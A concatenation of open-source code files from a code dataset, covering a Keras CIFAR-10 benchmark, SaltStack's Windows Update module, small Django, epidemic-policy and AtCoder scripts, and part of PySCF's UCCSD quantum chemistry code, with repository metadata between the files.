"""Model from https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py."""
model = tf.keras.Sequential()
model.add(
tf.keras.layers.Conv2D(
32, (3, 3), padding='same', input_shape=self.x_train.shape[1:]))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Conv2D(32, (3, 3)))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Dropout(0.25))
model.add(tf.keras.layers.Conv2D(64, (3, 3), padding='same'))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Conv2D(64, (3, 3)))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Dropout(0.25))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(512))
model.add(tf.keras.layers.Activation('relu'))
model.add(tf.keras.layers.Dropout(0.5))
model.add(tf.keras.layers.Dense(self.num_classes))
model.add(tf.keras.layers.Activation('softmax'))
return model
# In each benchmark test, the required arguments for the
# method `measure_performance` include:
# x: Input data, it could be Numpy or loaded from tfds.
# y: Target data. If `x` is a dataset or generator instance,
# `y` should not be specified.
# loss: Loss function for model.
# optimizer: Optimizer for model.
# Check more details in `measure_performance()` method of
# benchmark_util.
def benchmark_cnn_cifar10_bs_256(self):
"""Measure performance with batch_size=256."""
batch_size = 256
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_512(self):
"""Measure performance with batch_size=512."""
batch_size = 512
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_1024(self):
"""Measure performance with batch_size=1024."""
batch_size = 1024
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
def benchmark_cnn_cifar10_bs_1024_gpu_2(self):
"""Measure performance with batch_size=1024, gpu=2 and
distribution_strategy=`mirrored`.
"""
batch_size = 1024
metrics, wall_time, extras = benchmark_util.measure_performance(
self._build_model,
x=self.x_train,
y=self.y_train,
batch_size=batch_size,
num_gpus=2,
distribution_strategy='mirrored',
epochs=self.epochs,
optimizer=tf.keras.optimizers.RMSprop(learning_rate=0.0001, decay=1e-6),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.report_benchmark(wall_time=wall_time, metrics=metrics, extras=extras)
if __name__ == '__main__':
tf.test.main()
| 37.885714
| 93
| 0.692119
|
794e2abf5a24b34430ae8b54c3049bd20f1ea8b1
| 22,152
|
py
|
Python
|
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
salt/modules/win_update.py
|
skrobul/salt
|
ef7fb71082cce7a9783e00b9c65062fefae09263
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Module for running windows updates.
:depends: - win32com
- win32con
- win32api
- pywintypes
.. versionadded: (Helium)
'''
# Import Python libs
import logging
try:
import win32com.client
import pythoncom
HAS_DEPENDENCIES = True
except ImportError:
HAS_DEPENDENCIES = False
import salt.utils
log = logging.getLogger(__name__)
def __virtual__():
'''
Only works on Windows systems
'''
if salt.utils.is_windows() and HAS_DEPENDENCIES:
return True
return False
def _gather_update_categories(updateCollection):
'''
this is a convenience method to gather what categories of updates are available in any update
collection it is passed. Typically though, the download_collection.
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
'''
categories = []
for i in range(updateCollection.Count):
update = updateCollection.Item(i)
for j in range(update.Categories.Count):
name = update.Categories.Item(j).Name
if name not in categories:
log.debug('found category: {0}'.format(name))
categories.append(name)
return categories
class PyWinUpdater(object):
def __init__(self, categories=None, skipUI=True, skipDownloaded=True,
skipInstalled=True, skipReboot=False, skipPresent=True,
softwareUpdates=True, driverUpdates=False, skipHidden=True):
log.debug('CoInitializing the pycom system')
pythoncom.CoInitialize()
self.skipUI = skipUI
self.skipDownloaded = skipDownloaded
self.skipInstalled = skipInstalled
self.skipReboot = skipReboot
self.skipPresent = skipPresent
self.skipHidden = skipHidden
self.softwareUpdates = softwareUpdates
self.driverUpdates = driverUpdates
#the list of categories that the user wants to be searched for.
self.categories = categories
#the list of categories that are present in the updates found.
self.foundCategories = []
#careful not to get those two confused.
log.debug('dispatching update_session to keep the session object.')
self.update_session = win32com.client.Dispatch('Microsoft.Update.Session')
log.debug('update_session got. Now creating a win_searcher to seek out the updates')
self.win_searcher = self.update_session.CreateUpdateSearcher()
#list of updates that are applicable by current settings.
self.download_collection = win32com.client.Dispatch('Microsoft.Update.UpdateColl')
#list of updates to be installed.
self.install_collection = win32com.client.Dispatch('Microsoft.Update.UpdateColl')
#the object responsible for fetching the actual downloads.
self.win_downloader = self.update_session.CreateUpdateDownloader()
self.win_downloader.Updates = self.download_collection
#the object responsible for the installing of the updates.
self.win_installer = self.update_session.CreateUpdateInstaller()
self.win_installer.Updates = self.install_collection
#the results of the download process
self.download_results = None
#the results of the installation process
self.install_results = None
def Search(self, searchString):
try:
log.debug('beginning search of the passed string: {0}'.format(searchString))
self.search_results = self.win_searcher.Search(searchString)
log.debug('search completed successfully.')
except Exception as e:
log.info('search for updates failed. {0}'.format(str(e)))
return e
log.debug('parsing results. {0} updates were found.'.format(
str(self.search_results.Updates.Count)))
try:
#step through the list of the updates to ensure that the updates match the
# features desired.
for update in self.search_results.Updates:
#this skipps an update if UI updates are not desired.
if update.InstallationBehavior.CanRequestUserInput:
log.debug('Skipped update {0}'.format(str(update)))
continue
#if this update is already downloaded, it doesn't need to be in
# the download_collection. so skipping it unless the user mandates redownload.
if self.skipDownloaded and update.IsDownloaded:
continue
#check this update's categories aginst the ones desired.
for category in update.Categories:
#this is a zero gaurd. these tests have to be in this order
# or it will error out when the user tries to search for
# updates with out specifying categories.
if self.categories is None or category.Name in self.categories:
#adds it to the list to be downloaded.
self.download_collection.Add(update)
log.debug('added update {0}'.format(str(update)))
#ever update has 2 categories. this prevents the
#from being added twice.
break
log.debug('download_collection made. gathering found categories.')
#gets the categories of the updates available in this collection of updates
self.foundCategories = _gather_update_categories(self.download_collection)
log.debug('found categories: {0}'.format(str(self.foundCategories)))
return True
except Exception as e:
log.info('parsing updates failed. {0}'.format(str(e)))
return e
def AutoSearch(self):
'''
this function generates a search string. simplifying the search function while
still providing as many features as possible.
'''
search_string = ''
searchParams = []
if self.skipInstalled:
searchParams.append('IsInstalled=0')
else:
searchParams.append('IsInstalled=1')
if self.skipHidden:
searchParams.append('IsHidden=0')
else:
searchParams.append('IsHidden=1')
if self.skipReboot:
searchParams.append('RebootRequired=1')
else:
searchParams.append('RebootRequired=0')
if self.skipPresent:
searchParams.append('IsPresent=0')
else:
searchParams.append('IsPresent=1')
if len(searchParams) > 1:
for i in searchParams:
search_string += '{0} and '.format(i)
else:
search_string += '{0} and '.format(searchParams[1])
if self.softwareUpdates and self.driverUpdates:
search_string += 'Type=\'Software\' or Type=\'Driver\''
elif self.softwareUpdates:
search_string += 'Type=\'Software\''
elif self.driverUpdates:
search_string += 'Type=\'Driver\''
else:
return False
#if there is no type, the is nothing to search.
log.debug('generated search string: {0}'.format(search_string))
return self.Search(search_string)
def Download(self):
#chase the download_collection! do the actual download process.
try:
#if the download_collection is empty. no need to download things.
if self.download_collection.Count != 0:
self.download_results = self.win_downloader.Download()
else:
log.debug('Skipped downloading, all updates were already cached.')
return True
except Exception as e:
log.debug('failed in the downloading {0}.'.format(str(e)))
return e
def Install(self):
#beat those updates into place!
try:
#this does not draw from the download_collection. important thing to know.
#the blugger is created regardless of what the download_collection has done. but it
#will only download those updates which have been downloaded and are ready.
for update in self.search_results.Updates:
if update.IsDownloaded:
self.install_collection.Add(update)
log.debug('Updates prepared. beginning installation')
except Exception as e:
log.info('Preparing install list failed: {0}'.format(str(e)))
return e
#if the blugger is empty. no point it starting the install process.
if self.install_collection.Count != 0:
log.debug('Install list created, about to install')
updates = []
try:
#the call to install.
self.install_results = self.win_installer.Install()
log.info('Installation of updates complete')
return True
except Exception as e:
log.info('Installation failed: {0}'.format(str(e)))
return e
else:
log.info('no new updates.')
return True
def GetInstallationResults(self):
'''
this gets results of installation process.
'''
#if the blugger is empty, the results are nil.
log.debug('bluger has {0} updates in it'.format(str(self.install_collection.Count)))
if self.install_collection.Count == 0:
return {}
updates = []
log.debug('reparing update list')
for i in range(self.install_collection.Count):
#this gets the result from install_results, but the title comes from the update
#collection install_collection.
updates.append('{0}: {1}'.format(
str(self.install_results.GetUpdateResult(i).ResultCode),
str(self.install_collection.Item(i).Title)))
log.debug('Update results enumerated, now making a library to pass back')
results = {}
#translates the list of update results into a library that salt expects.
for i, update in enumerate(updates):
results['update {0}'.format(i)] = update
log.debug('Update information complied. returning')
return results
def GetInstallationResultsPretty(self):
'''
converts the installation results into a pretty print.
'''
updates = self.GetInstallationResults()
ret = 'The following are the updates and their return codes.\n'
for i in updates.keys():
ret += '\t{0} : {1}\n'.format(str(updates[i].ResultCode), str(updates[i].Title))
return ret
def GetDownloadResults(self):
updates = []
for i in range(self.download_collection.Count):
updates.append('{0}: {1}'.format(
str(self.download_results.GetUpdateResult(i).ResultCode),
str(self.download_collection.Item(i).Title)))
results = {}
for i, update in enumerate(updates):
results['update {0}'.format(i)] = update
return results
def GetSearchResults(self):
updates = []
log.debug('parsing results. {0} updates were found.'.format(
str(self.download_collection.count)))
for update in self.download_collection:
if update.InstallationBehavior.CanRequestUserInput:
log.debug('Skipped update {0}'.format(str(update)))
continue
updates.append(str(update))
log.debug('added update {0}'.format(str(update)))
return updates
def GetSearchResultsPretty(self):
updates = self.GetSearchResults()
ret = 'There are {0} updates. they are as follows:\n'.format(str(len(updates)))
for update in updates:
ret += '\t{0}\n'.format(str(update))
return ret
def SetCategories(self, categories):
self.categories = categories
def GetCategories(self):
return self.categories
def GetAvailableCategories(self):
return self.foundCategories
def SetIncludes(self, includes):
if includes:
for i in includes:
value = i[i.keys()[0]]
include = i.keys()[0]
self.SetInclude(include, value)
log.debug('was asked to set {0} to {1}'.format(include, value))
def SetInclude(self, include, state):
if include == 'UI':
self.skipUI = state
elif include == 'downloaded':
self.skipDownloaded = state
elif include == 'installed':
self.skipInstalled = state
elif include == 'reboot':
self.skipReboot = state
elif include == 'present':
self.skipPresent = state
elif include == 'software':
self.softwareUpdates = state
elif include == 'driver':
self.driverUpdates = state
log.debug('new search state: \n\tUI: {0}\n\tDownload: {1}\n\tInstalled: {2}\n\treboot :{3}\n\tPresent: {4}\n\tsoftware: {5}\n\tdriver: {6}'.format(
self.skipUI, self.skipDownloaded, self.skipInstalled, self.skipReboot,
self.skipPresent, self.softwareUpdates, self.driverUpdates))
def __str__(self):
updates = []
results = 'There are {0} updates, by category there are:\n'.format(
str(self.download_collection.count))
for category in self.foundCategories:
count = 0
for update in self.download_collection:
for c in update.Categories:
if category == c.Name:
count += 1
results += '\t{0}: {1}\n'.format(category, count)
return results
def _search(quidditch, retries=5):
'''
a wrapper method for the pywinupdater class. I might move this into the class, but right now,
that is to much for one class I think.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('Searching. tries left: {0}'.format(str(retries)))
#let the updater make it's own search string. MORE POWER this way.
passed = quidditch.AutoSearch()
log.debug('Done searching: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed in the seeking/parsing process:\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, True, retries)
passed = False
if clean:
#bragging rights.
comment += 'Search was done with out an error.\n'
return (comment, True, retries)
def _download(quidditch, retries=5):
'''
another wrapper method.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('Downloading. tries left: {0}'.format(str(retries)))
passed = quidditch.Download()
log.debug('Done downloading: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed while trying to download updates:\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, False, retries)
if clean:
comment += 'Download was done without error.\n'
return (comment, True, retries)
def _install(quidditch, retries=5):
'''
and the last wrapper method. keeping things simple.
'''
passed = False
clean = True
comment = ''
while not passed:
log.debug('download_collection is this long: {0}'.format(str(quidditch.install_collection.Count)))
log.debug('Installing. tries left: {0}'.format(str(retries)))
passed = quidditch.Install()
log.info('Done installing: {0}'.format(str(passed)))
if isinstance(passed, Exception):
clean = False
comment += 'Failed while trying to install the updates.\n\t\t{0}\n'.format(str(passed))
retries -= 1
if retries:
comment += '{0} tries to go. retrying\n'.format(str(retries))
passed = False
else:
comment += 'out of retries. this update round failed.\n'
return (comment, False, retries)
if clean:
comment += 'Install was done without error.\n'
return (comment, True, retries)
#this is where the actual functions available to salt begin.
def list_updates(verbose=False, includes=None, retries=5, categories=None):
'''
Returns a summary of available updates, grouped into their non-mutually
exclusive categories.
To list the actual updates by name, add 'verbose' to the call.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still indevelopment.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.list_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.list_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: '.format(str(categories)))
quidditch = PyWinUpdater()
if categories:
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
#this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
log.debug('verbose: {0}'.format(str(verbose)))
if verbose:
return str(quidditch.GetSearchResultsPretty())
return str(quidditch)
def download_updates(includes=None, retries=5, categories=None):
'''
Downloads all available updates, skipping those that require user interaction.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still indevelopment.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.download_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.download_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: '.format(str(categories)))
quidditch = PyWinUpdater()
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
##this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we get all the things! i.e. download updates.
comment, passed, retries = _download(quidditch, retries)
if not passed:
return (comment, str(passed))
try:
comment = quidditch.GetDownloadResults()
except Exception as e:
comment = 'could not get results, but updates were installed.'
return 'Windows is up to date. \n{0}'.format(comment)
def install_updates(cached=None, includes=None, retries=5, categories=None):
'''
Downloads and installs all available updates, skipping those that require user interaction.
Add 'cached' to only install those updates which have already been downloaded.
you can set the maximum number of retries to n in the search process by
adding: retries=n
various aspects of the updates can be included or excluded. this feature is
still indevelopment.
You can also specify by category of update similarly to how you do includes:
categories=['Windows 7', 'Security Updates']
Some known categories:
Updates
Windows 7
Critical Updates
Security Updates
Update Rollups
CLI Example:
Normal Usage:
.. code-block:: bash
salt '*' win_update.install_updates
Find all critical updates list in detail:
.. code-block:: bash
salt '*' win_update.install_updates categories=['Critical Updates'] verbose
'''
log.debug('categories to search for are: '.format(str(categories)))
quidditch = PyWinUpdater()
quidditch.SetCategories(categories)
quidditch.SetIncludes(includes)
##this is where we be seeking the things! yar!
comment, passed, retries = _search(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we get all the things! i.e. download updates.
comment, passed, retries = _download(quidditch, retries)
if not passed:
return (comment, str(passed))
##this is where we put things in their place!
comment, passed, retries = _install(quidditch, retries)
if not passed:
return (comment, str(passed))
try:
comment = quidditch.GetInstallationResultsPretty()
except Exception as e:
comment = 'could not get results, but updates were installed.'
return 'Windows is up to date. \n{0}'.format(comment)
| 36.494234
| 155
| 0.619628
|
794e2b175b2064a69b919caa321bf90ef310a05d
| 175
|
py
|
Python
|
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | 13
|
2022-02-25T05:04:58.000Z
|
2022-03-15T10:55:24.000Z
|
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | null | null | null |
accounts/apps.py
|
shervinbdndev/Django-Shop
|
baa4e7b91fbdd01ee591049c12cd9fbfaa434379
|
[
"MIT"
] | 1
|
2022-03-03T09:21:49.000Z
|
2022-03-03T09:21:49.000Z
|
from django.apps import AppConfig
class AccountsConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'accounts'
verbose_name = 'Users'
| 21.875
| 56
| 0.742857
|
794e2bfe5f44ea6368f9d55fe43d49288452b1b8
| 887
|
py
|
Python
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 16
|
2021-04-26T14:52:32.000Z
|
2022-01-22T07:13:06.000Z
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 34
|
2021-05-21T12:53:24.000Z
|
2022-02-09T16:30:40.000Z
|
examples/Policy/Pool_Testing/Generate_policy.py
|
healthbadge/episimmer
|
fcb3f7df812be045e2a6d031cac42080ad850d60
|
[
"BSD-3-Clause"
] | 4
|
2021-04-08T07:52:06.000Z
|
2021-05-29T05:58:15.000Z
|
import random
from episimmer.policy import lockdown_policy, testing_policy
def generate_policy():
policy_list=[]
# Normal Testing
#Normal_Test = Testing_Policy.TestPolicy(lambda x:60)
#Normal_Test.add_machine('Simple_Machine', 200, 0.0, 0.0, 0, 50, 2)
#Normal_Test.set_register_agent_testtube_func(Normal_Test.random_agents(1,1))
#policy_list.append(Normal_Test)
# Group/Pool Testing
Pool_Testing = testing_policy.TestPolicy(lambda x:150)
Pool_Testing.add_machine('Simple_Machine', 200, 0.0, 0.0, 0, 50, 2)
Pool_Testing.set_register_agent_testtube_func(Pool_Testing.random_agents(5,2))
policy_list.append(Pool_Testing)
ATP = lockdown_policy.AgentPolicyBasedLockdown('Testing',['Positive'],lambda x:random.random()<0.95,10)
policy_list.append(ATP)
def event_restriction_fn(agent,event_info,current_time_step):
return False
return policy_list,event_restriction_fn
| 31.678571
| 104
| 0.800451
|
794e2c4069b4986db01441487d2ae21edd4852a0
| 515
|
py
|
Python
|
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | 60
|
2015-02-13T01:30:46.000Z
|
2020-01-18T07:07:11.000Z
|
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | null | null | null |
query.py
|
no13bus/bustime
|
998a8a4489f3ef5310d14d73c93d9fb1690d2f49
|
[
"MIT"
] | 17
|
2015-02-13T01:48:19.000Z
|
2020-10-07T11:10:54.000Z
|
# coding: utf-8
import click
from api.bustime import BusTime
from config import DISTRICT
if __name__ == '__main__':
lineid = click.prompt(u'请输入线路id。格式为 "城市区号-线路号-0" 或者 "城市区号-线路号-1".\n1正向行使,0逆向行驶\n', value_proc=str)
city = DISTRICT[lineid.split('-')[0]]
search_stop_name_or_id = click.prompt(u'请输入需要查询的站点的名称或者在线路上的序号')
city_dict = dict(BusTime.get_cities())
cityid = city_dict[city]
bustime_result = BusTime.get_bus_realtime(lineid, cityid, search_stop_name_or_id)
print bustime_result
| 34.333333
| 102
| 0.737864
|
794e2e29cb6c15bdf3470e9facce420f0f1267fb
| 636
|
py
|
Python
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc106/abc106_d/9341820.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
I = np.array(sys.stdin.read().split(), dtype=np.int64)
n, m, q = I[:3]
l, r = I[3 : 3 + m * 2].reshape(-1, 2).T
p, q = I[3 + m * 2 :].reshape(-1, 2).T
def main():
res = np.zeros((n + 2, n + 2), dtype=np.int64)
np.add.at(res, (np.full(m, 1), r), 1)
np.add.at(res, (l + 1, r), -1)
np.add.at(res, (np.full(m, 1), np.full(m, n + 1)), -1)
np.add.at(res, (l + 1, np.full(m, n + 1)), 1)
res = np.cumsum(res, axis=0)
res = np.cumsum(res, axis=1)
ans = res[p, q]
return ans
if __name__ == "__main__":
ans = main()
print(*ans, sep="\n")
| 22.714286
| 59
| 0.484277
|
794e2efbc548b665a7c720c784c20d821699e399
| 43
|
py
|
Python
|
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
amazonprimedrocomgesaxda/StyleGAN2
|
5440fe431a711c5f70b81f8351e968dcf48a56f3
|
[
"BSD-Source-Code"
] | null | null | null |
inport os alpha
alpha.system("nvidia-smi")
| 14.333333
| 26
| 0.767442
|
794e2fe9dd7db8aed2ed324869d99cbda273db82
| 52,262
|
py
|
Python
|
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/cc/uccsd.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Timothy Berkelbach <tim.berkelbach@gmail.com>
#
'''
UCCSD with spatial integrals
'''
import time
from functools import reduce
import numpy as np
from pyscf import lib
from pyscf import ao2mo
from pyscf.lib import logger
from pyscf.cc import ccsd
from pyscf.cc import rccsd
from pyscf.ao2mo import _ao2mo
from pyscf.mp import ump2
from pyscf import scf
from pyscf import __config__
MEMORYMIN = getattr(__config__, 'cc_ccsd_memorymin', 2000)
# This is unrestricted (U)CCSD, in spatial-orbital form.
def update_amps(cc, t1, t2, eris):
time0 = time.clock(), time.time()
log = logger.Logger(cc.stdout, cc.verbose)
t1a, t1b = t1
t2aa, t2ab, t2bb = t2
nocca, noccb, nvira, nvirb = t2ab.shape
mo_ea_o = eris.mo_energy[0][:nocca]
mo_ea_v = eris.mo_energy[0][nocca:] + cc.level_shift
mo_eb_o = eris.mo_energy[1][:noccb]
mo_eb_v = eris.mo_energy[1][noccb:] + cc.level_shift
fova = eris.focka[:nocca,nocca:]
fovb = eris.fockb[:noccb,noccb:]
u1a = np.zeros_like(t1a)
u1b = np.zeros_like(t1b)
#:eris_vvvv = ao2mo.restore(1, np.asarray(eris.vvvv), nvirb)
#:eris_VVVV = ao2mo.restore(1, np.asarray(eris.VVVV), nvirb)
#:eris_vvVV = _restore(np.asarray(eris.vvVV), nvira, nvirb)
#:u2aa += lib.einsum('ijef,aebf->ijab', tauaa, eris_vvvv) * .5
#:u2bb += lib.einsum('ijef,aebf->ijab', taubb, eris_VVVV) * .5
#:u2ab += lib.einsum('iJeF,aeBF->iJaB', tauab, eris_vvVV)
tauaa, tauab, taubb = make_tau(t2, t1, t1)
u2aa, u2ab, u2bb = cc._add_vvvv(None, (tauaa,tauab,taubb), eris)
u2aa *= .5
u2bb *= .5
Fooa = .5 * lib.einsum('me,ie->mi', fova, t1a)
Foob = .5 * lib.einsum('me,ie->mi', fovb, t1b)
Fvva = -.5 * lib.einsum('me,ma->ae', fova, t1a)
Fvvb = -.5 * lib.einsum('me,ma->ae', fovb, t1b)
Fooa += eris.focka[:nocca,:nocca] - np.diag(mo_ea_o)
Foob += eris.fockb[:noccb,:noccb] - np.diag(mo_eb_o)
Fvva += eris.focka[nocca:,nocca:] - np.diag(mo_ea_v)
Fvvb += eris.fockb[noccb:,noccb:] - np.diag(mo_eb_v)
dtype = u2aa.dtype
wovvo = np.zeros((nocca,nvira,nvira,nocca), dtype=dtype)
wOVVO = np.zeros((noccb,nvirb,nvirb,noccb), dtype=dtype)
woVvO = np.zeros((nocca,nvirb,nvira,noccb), dtype=dtype)
woVVo = np.zeros((nocca,nvirb,nvirb,nocca), dtype=dtype)
wOvVo = np.zeros((noccb,nvira,nvirb,nocca), dtype=dtype)
wOvvO = np.zeros((noccb,nvira,nvira,noccb), dtype=dtype)
mem_now = lib.current_memory()[0]
max_memory = max(0, cc.max_memory - mem_now - u2aa.size*8e-6)
if nvira > 0 and nocca > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvira**3*3+1)))
for p0,p1 in lib.prange(0, nocca, blksize):
ovvv = eris.get_ovvv(slice(p0,p1)) # ovvv = eris.ovvv[p0:p1]
ovvv = ovvv - ovvv.transpose(0,3,2,1)
Fvva += np.einsum('mf,mfae->ae', t1a[p0:p1], ovvv)
wovvo[p0:p1] += lib.einsum('jf,mebf->mbej', t1a, ovvv)
u1a += 0.5*lib.einsum('mief,meaf->ia', t2aa[p0:p1], ovvv)
u2aa[:,p0:p1] += lib.einsum('ie,mbea->imab', t1a, ovvv.conj())
tmp1aa = lib.einsum('ijef,mebf->ijmb', tauaa, ovvv)
u2aa -= lib.einsum('ijmb,ma->ijab', tmp1aa, t1a[p0:p1]*.5)
ovvv = tmp1aa = None
if nvirb > 0 and noccb > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvirb**3*3+1)))
for p0,p1 in lib.prange(0, noccb, blksize):
OVVV = eris.get_OVVV(slice(p0,p1)) # OVVV = eris.OVVV[p0:p1]
OVVV = OVVV - OVVV.transpose(0,3,2,1)
Fvvb += np.einsum('mf,mfae->ae', t1b[p0:p1], OVVV)
wOVVO[p0:p1] = lib.einsum('jf,mebf->mbej', t1b, OVVV)
u1b += 0.5*lib.einsum('MIEF,MEAF->IA', t2bb[p0:p1], OVVV)
u2bb[:,p0:p1] += lib.einsum('ie,mbea->imab', t1b, OVVV.conj())
tmp1bb = lib.einsum('ijef,mebf->ijmb', taubb, OVVV)
u2bb -= lib.einsum('ijmb,ma->ijab', tmp1bb, t1b[p0:p1]*.5)
OVVV = tmp1bb = None
if nvirb > 0 and nocca > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvira*nvirb**2*3+1)))
for p0,p1 in lib.prange(0, nocca, blksize):
ovVV = eris.get_ovVV(slice(p0,p1)) # ovVV = eris.ovVV[p0:p1]
Fvvb += np.einsum('mf,mfAE->AE', t1a[p0:p1], ovVV)
woVvO[p0:p1] = lib.einsum('JF,meBF->mBeJ', t1b, ovVV)
woVVo[p0:p1] = lib.einsum('jf,mfBE->mBEj',-t1a, ovVV)
u1b += lib.einsum('mIeF,meAF->IA', t2ab[p0:p1], ovVV)
u2ab[p0:p1] += lib.einsum('IE,maEB->mIaB', t1b, ovVV.conj())
tmp1ab = lib.einsum('iJeF,meBF->iJmB', tauab, ovVV)
u2ab -= lib.einsum('iJmB,ma->iJaB', tmp1ab, t1a[p0:p1])
ovVV = tmp1ab = None
if nvira > 0 and noccb > 0:
blksize = max(ccsd.BLKMIN, int(max_memory*1e6/8/(nvirb*nvira**2*3+1)))
